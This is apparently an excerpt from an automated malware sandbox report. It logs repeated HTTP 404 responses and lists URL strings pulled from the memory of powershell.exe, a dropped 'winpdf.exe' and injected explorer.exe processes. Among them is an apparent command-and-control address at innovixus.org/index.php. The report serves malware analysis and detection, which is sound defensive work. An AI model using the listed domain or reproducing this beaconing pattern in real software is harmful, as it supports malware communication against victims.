        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: powershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmp, winpdf.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CC75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20181642374.000000000CD4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.20005267451.000000000CD4B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
        Source: powershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmp, winpdf.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
        Source: powershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmp, winpdf.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
        Source: powershell.exe, 00000000.00000002.19477320488.0000024CC12EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: winpdf.exe, 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmp, winpdf.exe, 00000003.00000003.19328350189.000000000502F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20175205390.0000000011C9D000.00000004.00000001.00020000.00000000.sdmp, Productive.pif.4.dr, Fluid.3.dr, fejhsit.16.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
        Source: winpdf.exe, 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmp, winpdf.exe, 00000003.00000003.19328350189.000000000502F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20175205390.0000000011C9D000.00000004.00000001.00020000.00000000.sdmp, Productive.pif.4.dr, Fluid.3.dr, fejhsit.16.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
        Source: winpdf.exe, 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmp, winpdf.exe, 00000003.00000003.19328350189.000000000502F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20175205390.0000000011C9D000.00000004.00000001.00020000.00000000.sdmp, Productive.pif.4.dr, Fluid.3.dr, fejhsit.16.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
        Source: powershell.exe, 00000000.00000002.19477320488.0000024CC12EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: winpdf.exe, 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmp, winpdf.exe, 00000003.00000003.19328350189.000000000502F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20175205390.0000000011C9D000.00000004.00000001.00020000.00000000.sdmp, Productive.pif.4.dr, Fluid.3.dr, fejhsit.16.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CEC4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.mD
        Source: powershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmp, winpdf.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
        Source: powershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmp, winpdf.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CC75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20181642374.000000000CD4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.20005267451.000000000CD4B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
        Source: powershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmp, winpdf.exe.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
        Source: powershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmp, winpdf.exe.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
        Source: powershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmp, winpdf.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: powershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmp, winpdf.exe.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
        Source: powershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmp, winpdf.exe.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
        Source: explorer.exe, 00000012.00000002.20536514758.00000000035F8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.20536514758.0000000003665000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.20536514758.0000000003675000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovixus.org/
        Source: explorer.exe, 00000012.00000002.20536514758.00000000035F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovixus.org/Q
        Source: explorer.exe, 00000012.00000002.20536514758.0000000003675000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovixus.org/application/x-www-form-urlencodedMozilla/5.0
        Source: explorer.exe, 00000012.00000002.20536514758.000000000366D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.20536514758.00000000035F8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.20227321844.0000000001230000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.24416336097.0000000003298000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.24416107223.00000000005D9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.24416556397.0000000003727000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.24415732892.0000000000A69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20383027059.0000000004DF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.24416673585.0000000000A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovixus.org/index.php
        Source: explorer.exe, 00000019.00000003.20685140752.0000000004DF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.21617248969.0000000004DF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.24418047881.0000000004DF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovixus.org/index.php66
        Source: explorer.exe, 00000012.00000002.20536514758.00000000035F8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.20227321844.0000000001230000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.24416336097.0000000003298000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.24416107223.00000000005D9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.24416556397.0000000003727000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.24415732892.0000000000A69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.24416673585.0000000000A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovixus.org/index.phpMozilla/5.0
        Source: explorer.exe, 00000012.00000002.20536514758.00000000035F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovixus.org/index.phpt
        Source: explorer.exe, 00000012.00000002.20536514758.00000000035F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovixus.org/ndex.php
